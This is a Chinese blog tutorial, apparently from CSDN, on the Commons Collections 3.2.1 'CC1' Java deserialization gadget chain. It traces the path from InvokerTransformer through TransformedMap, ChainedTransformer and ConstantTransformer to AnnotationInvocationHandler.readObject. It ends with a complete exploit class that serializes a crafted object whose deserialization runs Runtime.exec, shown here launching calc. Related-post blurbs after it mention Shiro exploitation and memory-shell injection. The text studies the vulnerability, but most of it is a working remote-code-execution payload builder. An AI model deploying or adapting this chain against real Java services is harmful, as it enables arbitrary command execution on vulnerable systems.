CC1反序列化链

原创 已于 2022-11-02 16:04:25 修改 · 569 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java

于 2022-11-02 16:01:29 首次发布
该文章已生成可运行项目,

学习的白日梦组长https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.999.0.0

环境

1.jkd8u65
下载地址:https://blog.lupf.cn/articles/2022/02/19/1645283454543.html

2.与oracle jdk对应版本的sun包
下载地址:http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/file/af660750b2f4/src/share/classes/sun

3.Commons Collections 3.2.1(版本高了可能就没漏洞了)
使用maven自动导包,在pom.xml里设置
依赖:

<dependencies>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>

InvokerTransformer.transform()

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
    super();
    iMethodName = methodName;
    iParamTypes = paramTypes;
    iArgs = args;
}    

public Object transform(Object input) {
    if (input == null) {
        return null;
    }
    try {
        Class cls = input.getClass();
        Method method = cls.getMethod(iMethodName, iParamTypes);
        return method.invoke(input, iArgs);

    } catch (NoSuchMethodException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
    } catch (IllegalAccessException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
    } catch (InvocationTargetException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
    }
}

这里就相当于使用反射来调用方法了,但是这里是使用的getClass(),所以要只能对一个对象使用

eg:

弹计算器

import org.apache.commons.collections.functors.InvokerTransformer;

import javax.xml.crypto.dsig.Transform;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class cc1 {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Runtime runtime = Runtime.getRuntime();
        new InvokerTransformer("exec",new Class []{String.class},new Object[]{"calc"}).transform(runtime);//要对一个实例化对象使用
    }
}

这个就相当于是链子的最后面了

然后找哪里调用了transform()

TransformedMap

TransformedMap.checkSetValue()中调用了transform()

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    return new TransformedMap(map, keyTransformer, valueTransformer);
}

protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    super(map);
    this.keyTransformer = keyTransformer;
    this.valueTransformer = valueTransformer;
}

protected Object checkSetValue(Object value) {
    return valueTransformer.transform(value);
}

实例化这个类

InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class []{String.class},new Object[]{"calc"});
Map<Object,Object> map = new HashMap<>();
TransformedMap transformedMap = (TransformedMap) TransformedMap.decorate(map,null,invokerTransformer);

这里的因为只对valueTransformer调用transform,所以keyTransformer的值可以设为空

然后再看哪里调用了checkSetValue()

AbstractInputCheckedMapDecorator

这个类是TransformedMap(上面的那个)的父类

在AbstractInputCheckedMapDecorator的MapEntry静态类中的setValue()调用了checkSetValue()

static class MapEntry extends AbstractMapEntryDecorator {

    /** The parent map */
    private final AbstractInputCheckedMapDecorator parent;

    protected MapEntry(Map.Entry entry, AbstractInputCheckedMapDecorator parent) {
        super(entry);
        this.parent = parent;
    }

    public Object setValue(Object value) {
        value = parent.checkSetValue(value);
        return entry.setValue(value);
    }
}

Java的entry是一个静态内部类,实现Map.Entry< K ,V> 这个接口,通过entry类可以构成一个单向链表。

这个MapEntry类继承了AbstractMapEntryDecorator,而AbstractMapEntryDecorator又实现了Map.Entry接口

所以这里的setValue其实是Map.Entry接口类的一个方法,这样在遍历entry类的时候就可以执行这里的setValue()方法

eg:

import javax.xml.crypto.dsig.Transform;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Runtime runtime = Runtime.getRuntime();
        Class c = Runtime.class;
        Method exec = c.getMethod("exec", String.class);
//        exec.invoke(runtime,"calc");
//        new InvokerTransformer("exec",new Class []{String.class},new Object[]{"calc"}).transform(runtime);
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class []{String.class},new Object[]{"calc"});
        Map<Object,Object> map = new HashMap<>();
        map.put("key","value");
        Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,invokerTransformer);
        for (Map.Entry entry:transformedMap.entrySet()){
            entry.setValue(runtime);
        }
    }

}

这样就可以弹出计算器了

所以只要有遍历数组的地方,调用了setValue(),我们就可以调用这条链

在看看有没有谁的readObject()里调用了setValue()

AnnotationInvocationHandler

在这个类的readObject()方法里调用了setValue()

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    s.defaultReadObject();

    // Check to make sure that types have not evolved incompatibly

    AnnotationType annotationType = null;
    try {
        annotationType = AnnotationType.getInstance(type);
    } catch(IllegalArgumentException e) {
        // Class is no longer an annotation type; time to punch out
        throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
    }

    Map<String, Class<?>> memberTypes = annotationType.memberTypes();

    // If there are annotation members without values, that
    // situation is handled by the invoke method.
    for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
        String name = memberValue.getKey();
        Class<?> memberType = memberTypes.get(name);
        if (memberType != null) {  // i.e. member still exists
            Object value = memberValue.getValue();
            if (!(memberType.isInstance(value) ||
                  value instanceof ExceptionProxy)) {
                memberValue.setValue(
                    new AnnotationTypeMismatchExceptionProxy(
                        value.getClass() + "[" + value + "]").setMember(
                        annotationType.members().get(name)));
            }
        }
    }
}

可以看出,这里是对memberValues进行遍历

查看构造函数

AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
    Class<?>[] superInterfaces = type.getInterfaces();
    if (!type.isAnnotation() ||
        superInterfaces.length != 1 ||
        superInterfaces[0] != java.lang.annotation.Annotation.class)
        throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
    this.type = type;
    this.memberValues = memberValues;
}

这里我们可以控制memberValues参数,所以把上面构造的invokerTransformer替换上去就行

type参数的类型是继承了Annotation(注释)的类型

我们要实例化这个类,然后对这个类进行序列化和反序列化

要注意,这个类是default类,只能被这个包内的类和本类访问。

image-20221101234156467

所以只能使用反射来实例化这个类

class AnnotationInvocationHandler implements InvocationHandler, Serializable {
   ...
}

我们先用反射实例化这个类

import javax.xml.crypto.dsig.Transform;
import java.lang.annotation.Annotation;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Runtime runtime = Runtime.getRuntime();
        Class c = Runtime.class;
        Method exec = c.getMethod("exec", String.class);
//        exec.invoke(runtime,"calc");
//        new InvokerTransformer("exec",new Class []{String.class},new Object[]{"calc"}).transform(runtime);
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class []{String.class},new Object[]{"calc"});
        Map<Object,Object> map = new HashMap<>();
        map.put("key","value");
        Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,invokerTransformer);
//        for (Map.Entry entry:transformedMap.entrySet()){
//            entry.setValue(runtime);
//        }
        Class annotation = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationconst = annotation.getDeclaredConstructor(Class.class,Map.class);
        annotationconst.setAccessible(true);
        Object annotationInvocationHandler = annotationconst.newInstance(Override.class,transformedMap);
    }
}

如果直接序列化反序列化的话会发现无法弹计算器。我们还需要解决几个问题

Runtime无法序列化

首先是Runtime这个类是无法序列化的,所以要使用反射,因为Class类是可以序列化的

public final class Class<T> implements java.io.Serializable,
                              GenericDeclaration,
                              Type,
                              AnnotatedElement {
                                  ...
                              }

正常使用反射执行Runtime的exec()

Class c = Runtime.class;
Method getruntimemethod = c.getMethod("getRuntime",null);
Runtime runtime =(Runtime) getruntimemethod.invoke(null,null);
Method execmethod = c.getMethod("exec", String.class);
execmethod.invoke(runtime,"calc");

因为我们要利用commons-collections里面的类来执行这个链,所以要使用InvokerTransformer来执行反射

Class c = Runtime.class;

Method getruntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(c);

Runtime runtime = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(getruntimeMethod);

new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);

这里是先使用Class类的getMethod方法获取Runtime类的getRuntime方法,然后再使用Class类的invoke方法获取实例

最后再获取Runtime的exec方法并执行

这里可能会有点绕,因为这里是先获取Class类中的getMethod再来对Runtime类进行getMethod

我就会想为什么不能直接对Runtime类进行getMethod。

这样做的原因是因为在InvokerTransformer.transform中的代码是这样的

public Object transform(Object input) {
    if (input == null) {
        return null;
    }
    try {
        Class cls = input.getClass();
        Method method = cls.getMethod(iMethodName, iParamTypes);
        return method.invoke(input, iArgs);

    } ...
}

而这个getClass()要对一个实例化的对象使用,又因为我们在目标环境中无法直接获取Runtime的对象,所以要这样先获取他的getRuntime静态方法,再

调用执行这个方法来获取Runtime实例

然后再执行exec方法来执行命令

这样就可以获得一个可以序列化的对象

这里可以使用ChainedTransformer.transform()来递归执行,可以让链子更简单

public ChainedTransformer(Transformer[] transformers) {
    super();
    iTransformers = transformers;
}    
public Object transform(Object object) {
    for (int i = 0; i < iTransformers.length; i++) {
        object = iTransformers[i].transform(object);
    }
    return object;
}

这里可以看到ChainedTransformer.transform()可以把Transformer[]数组里,前一个transform()的结果调到下一个transform()里用

这里跟上面写的逻辑刚好一样

image-20221102092811090

所以可以这样写

Transformer [] transforms = new Transformer[]{
    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
    new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transforms);
chainedTransformer.transform(Runtime.class);

注意这个Transformer要选对包

要通过if判断

AnnotationInvocationHandler.readObject()

如果要执行到setValue,要经过两个if

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    s.defaultReadObject();

    // Check to make sure that types have not evolved incompatibly

    AnnotationType annotationType = null;
    try {
        annotationType = AnnotationType.getInstance(type);
    } catch(IllegalArgumentException e) {
        ...
    }

    Map<String, Class<?>> memberTypes = annotationType.memberTypes();

    // If there are annotation members without values, that
    // situation is handled by the invoke method.
    for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
        String name = memberValue.getKey();
        Class<?> memberType = memberTypes.get(name);
        if (memberType != null) {  // i.e. member still exists
            Object value = memberValue.getValue();
            if (!(memberType.isInstance(value) ||
                  value instanceof ExceptionProxy)) {
                memberValue.setValue(
                    new AnnotationTypeMismatchExceptionProxy(
                        value.getClass() + "[" + value + "]").setMember(
                        annotationType.members().get(name)));
            }
        }
    }
}

首先看第一个if

if (memberType != null)

从上面开始看

annotationType = AnnotationType.getInstance(type);//看方法名字,就是获取type的实例,这个type就是构造函数里的type参数
Map<String, Class<?>> memberTypes = annotationType.memberTypes();//获取这个实例的成员

这个type就是构造函数里的那注释的类

AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
    Class<?>[] superInterfaces = type.getInterfaces();
    if (!type.isAnnotation() ||
        superInterfaces.length != 1 ||
        superInterfaces[0] != java.lang.annotation.Annotation.class)
        throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
    this.type = type;
    this.memberValues = memberValues;
}

所以这里需要注释的类有成员,我们使用Target注释类,里面有个ElementType[] value()成员

package java.lang.annotation;
@Documented
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.ANNOTATION_TYPE)
public @interface Target {
    /**
     * Returns an array of the kinds of elements an annotation type
     * can be applied to.
     * @return an array of the kinds of elements an annotation type
     * can be applied to
     */
    ElementType[] value();
}

然后我们要让memberValue.getKey()得到的值等于

Class<?> memberType = memberTypes.get(name)里的name

这样才能达成memberType != null

这里的memberValues就是TransformedMap.decorate(map,null,invokerTransformer);里的map

所以给map设键名为value

Map<Object, Object> map = new HashMap<>();
map.put("value", "xxxx");

再后面的if就是判断是否能够类型强转

if (!(memberType.isInstance(value) ||
                      value instanceof ExceptionProxy))

这里的value就是那个map里键值对的,一个是类,一个字符串,所以是肯定不能强转的

这样我们就能够通过重重if,最后调用到setValue方法

但是最后发现这里setValue我们是不可控制的

memberValue.setValue(
    new AnnotationTypeMismatchExceptionProxy(
        value.getClass() + "[" + value + "]").setMember(
            annotationType.members().get(name)))

如果要成功执行命令,从上面知道,setValue的参数应该是一个Runtime实例。

ConstantTransformer

我们知道,这里最后是调用chainedTransformer.transform(),且参数值就是上面的setValue里的值

Transformer [] transforms = new Transformer[]{
    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
    new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};

这里可以使用ConstantTransformer.transform()来获取我们想要的类

因为他的transform是我们传进去什么,他就传回来什么

public ConstantTransformer(Object constantToReturn) {
    super();
    iConstant = constantToReturn;
}    

public Object transform(Object input) {
    return iConstant;
}

所以只要我们实例化这个类为

new ConstantTransformer(Runtime.class)

这样调用ConstantTransformer.transform时就会返回一个Runtime.class

这样我们就不用考虑chainedTransformer.transform()传入的参数是什么了

所以Transformer数组为

Transformer [] transforms = new Transformer[]{
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
    new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};

POP

sun.reflect.annotation.AnnotationInvocationHandler.readObject()->
AbstractInputCheckedMapDecorator.setValue()->
TransformedMap.checkSetValue()->
ChainedTransformer.transform()->ConstantTransformer.transform()->InvokerTransformer.transform()->
Runtime.exec()

exp:

import com.sun.javafx.collections.MappingChange;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import javax.xml.crypto.dsig.Transform;
import java.lang.annotation.Annotation;
import java.lang.annotation.ElementType;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        
        Transformer [] transforms = new Transformer[]{
                 new ConstantTransformer(Runtime.class),
                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                 new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                 new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        
        ChainedTransformer chainedTransformer = new ChainedTransformer(transforms);
        
        Map<Object, Object> map = new HashMap<>();
        map.put("value", "xxx");
        
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);

        Class annotation = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        
        Constructor annotationconst = annotation.getDeclaredConstructor(Class.class, Map.class);
        
        annotationconst.setAccessible(true);
        
        Object annotationInvocationHandler = annotationconst.newInstance(Target.class, transformedMap);
        
        serialize(annotationInvocationHandler);
        
        unserialize("1.bin");

    }
    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("1.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String filename) throws Exception{
        ObjectInputStream oip = new ObjectInputStream(new FileInputStream(filename));
        Object obj = oip.readObject();
        return obj;
    }

}

然后就可以欢乐的弹计算器了。

本文章已经生成可运行项目
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3940
ysoserial这款工具,堪称为“java反序列利用神器”。
Java反序列化之Commons-Beanutils1与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1707
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java类对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
ysoserial-cc1 java反序列化
springgold的博客
09-01 490
yso-cc1 1. 从入口看 1)run方法 2)回到类的getobject 3)生成 transformer 反射和lazymap对象 4)代理对象创建 使用代理实现类(AnnotationInvocationHandler) 5)返回代理类,反射ChainedTransformer的iTransformers属性赋值transformers(反射) 6)返回AnnotationInvocationHandler 对象 7)序列化 8)所以入口就在AnnotationInvocation
漏洞复现--致远 M3 反序列化 mobile_portal RCE
qq_53003652的博客
11-27 6444
M3server提供了多种功能模块,涵盖了办公自动化、项目管理、文档管理、流程管理、日程安排、知识管理等方面。再请求/mobile_portal/api/systemLog/pns/loadLog/app.log接口。严格限制/mobile_portal/接口的访问权限,关注厂家官网获取修复补丁。使用ysoserial生成CBTomcatCmdEcho回显内存马。利用CB1生成hex代码,替换POC中的HEX。执行命令,在请求内容加上cmd执行命令回显。致远M3 server。成功执行ping命令。
Java安全』反序列化-CB反序列化漏洞POP分析_ysoserial CommonsBeanutils1 PoC分析
Ho1aAs‘s Blog
03-14 3375
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TemplatseImpl.getOutputProperties()触发newTransformer()2. BeanComparator.compare()触发PropertyUtils.getProperty()3. PriorityQueue反序列化调用comparator.compare()为什么BeanComparator要传入lowestSetBit?为什么要添加BigInteger?POP完 前言 CB1类似CC2,利用优先级队列
Java反序列化注入内存马
02-09 2837
Java内存马总体有Servlet/Filter/Listern/Java-Agent四种,前三种思路都差不多,通过不同方式获取到ApplicationContext/servletContext/StandardContext等对象,然后往ApplicationContext/servletContext/StandardContext注入恶意的Servlet/Filter/Listern,这里通过注入 Filter实现内存马。 实现一 通过Thread.currentThread().getContex
【Web】Java反序列化CB1花样调TemplatesImpl打Shiro
uuzeray的博客
03-02 1663
如果 this.property 不为空,则用 PropertyUtils.getProperty 分别取传入的两个对象的 this.property 属性,而this.property是在BeanComparator的构造方法处传入的(也可以用反射来操作),完全可控。当o1/o2是一个 TemplatesImpl 对象时,property 的值为 outputProperties 时,我们就可调用TemplatesImpl#getOutputProperties(),完成攻击的调用。
commons-collections1(cc1)反序列化分析
遇事不决冲冲冲
01-30 5425
commons-collections1也就是常说的cc1,网上一般有两条子,一个就是ysoserial中的lazymap,还有transformedmap,刚开始碰到cc1子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!
Java反序列化漏洞利用分析:CommonsCollections1CC1
最新发布
syjshs的博客
07-26 640
Java 反序列化漏洞利用中,CommonsCollections1(简称 CC1) 是最经典、最入门的一条利用。本文将结合CC1Test1CC1Test2两个利用样例,从整体流程、关键类、条构造逻辑以及漏洞触发机制等多个方面,对 CC1 进行详细分析。
JavaSec | jackson反序列化通杀
zkaqlaoniao的博客
05-28 1335
前面简单了解了一下jackson反序列化,可以知道在序列化时会调用getter方法,而反序列化时会调用setter,但是都是有一定限制的,这里就来了解一下原生的打法。测试环境:• JDK8u71
JAVA反序列化漏洞-ysoserial-URLDNS分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 1197
对于进行反序列化漏洞原理的学习,URLDNS这条比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
Java代码审计:反序列化CommonsCollections1详解
god_Zeo的安全博客
08-27 1789
0x01 漏洞介绍 Apache Commons Collections是一个第三方的基础类库,提供了很多强有力的数据结构类型并且实现了各种集合工具类,可以说是apache开源项目的重要组件。 CommonsCollection在java反序列化的源流中已经存在5年 今天介绍的CommonsCollections1反序列化的第一种RCE序列化 CommonsCollections1反序列化漏洞点仍然是commons-collections-3.1版本 0x02 实验环境 maven的pom导入依赖
java反序列化CC1
qq_62540010的博客
03-16 615
Java Commons Collections的利用也被称为cc,是在学习反序列化漏洞必不可少的一个部分。首先先介绍一下Commons Collection组件,Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合⼯ 具类。collection是set,list,queue的抽象。
Java代码审计&Shiro反序列化&CB1&source入口&sink执行&gadget
qq_46081990的博客
01-22 2693
本文详细介绍了Shiro550 Commons BeanUtils反序列化利用,以代码审计的角度跟踪分析Commons BeanUtils的source、sink以及gadget,解释了该触发反序列化漏洞并最终造成RCE命令执行的根本原因是什么,并且在最后深入分析了Commons BeanUtilspayload的生成逻辑。
Java反序列化-CommonsBeanUtils 1分析
每天一小步,进步一大截
05-10 1828
这条子是一个比较重要的子,后续的shiro框架漏洞都会用到。打子,需要注意对应的依赖去打
JAVA安全—Shiro反序列化&CB1&source入口&sink执行&gadget
2301_76227305的博客
03-04 1140
CBJava反序列化漏洞攻击中使用的攻击,主要依赖是Apache Commons项目中的Commons BeanUtils库,Commons BeanUtils库提供了用于操作Java对象的实用工具类,例如BeanMap和BeanComparator等。攻击者可以构建一个恶意的反序列化,通过组合这些特殊的类和方法,形成一个CB。当反序列化操作触发时,CB会执行预定义的操作,最终导致执行攻击者的恶意代码。至此结束,虽然看着很长,但是一步一步跟踪下来发现其实也就那么一回事。
[Java反序列化]CommonsBeanutils与Shiro with noCC
GX233的博客
07-17 749
我们在调用BeanComparator的无参构造方法时,会自行将comparator设置为ComparableComparator的实例,而ComparableComparator是CommonsCollections的类,所以为了避免使用到CommonsCollections的类,我们需要自己设置一个comparator。简单地说,该类在反序列化的时候,会检查队列元素是否符合优先队列的次序,所以会调用到compare,而成员变量的comparator我们可以放入BeanComparator。
shiro无依赖利用及exp编写
Thunderclap的博客
02-08 1591
因为shiro是存在commons-beanutils的依赖的,这样我们可以通过构造原生的CB1进行攻击shiro,但是我们通过ysoserial的CB1会发现其实并不会成功。原因是因为CB1里面其实是依赖于commons.collections包里面的部分内容的。如下发现是在我们构造BeanComparator的时候会调用,当没有显式传入Comparator 的情况下,则默认使用ComparableComparator。
[Java反序列化]CommonsBeanutils1利用学习
feng的博客
08-29 2148
前言 继续反序列化的学习。 预备知识 之所以会提到CommonsBeanutils的反序列化,是因为shiro是依赖commons-beanutils的,当然这是接下来学习的东西的。 根据名字就知道,类似Commons-Collections是对集合的封装和补充,commons-beanutils是应用于javabean的工具。 至于什么是JavaBean,放一下维基百科的定义,很简单: 有一个public的无参数构造函数。 属性可以透过get、set、is(可替代get,用在布尔型属性上)方法或遵循特
java反序列化漏洞子有哪些
04-01
Java 反序列化漏洞是一种常见的安全问题,攻击者可以通过构造恶意输入来触发目标程序中的不安全行为。这种漏洞通常发生在应用程序对接收到的数据进行反序列化的过程中,如果数据被篡改或者包含恶意代码,则可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值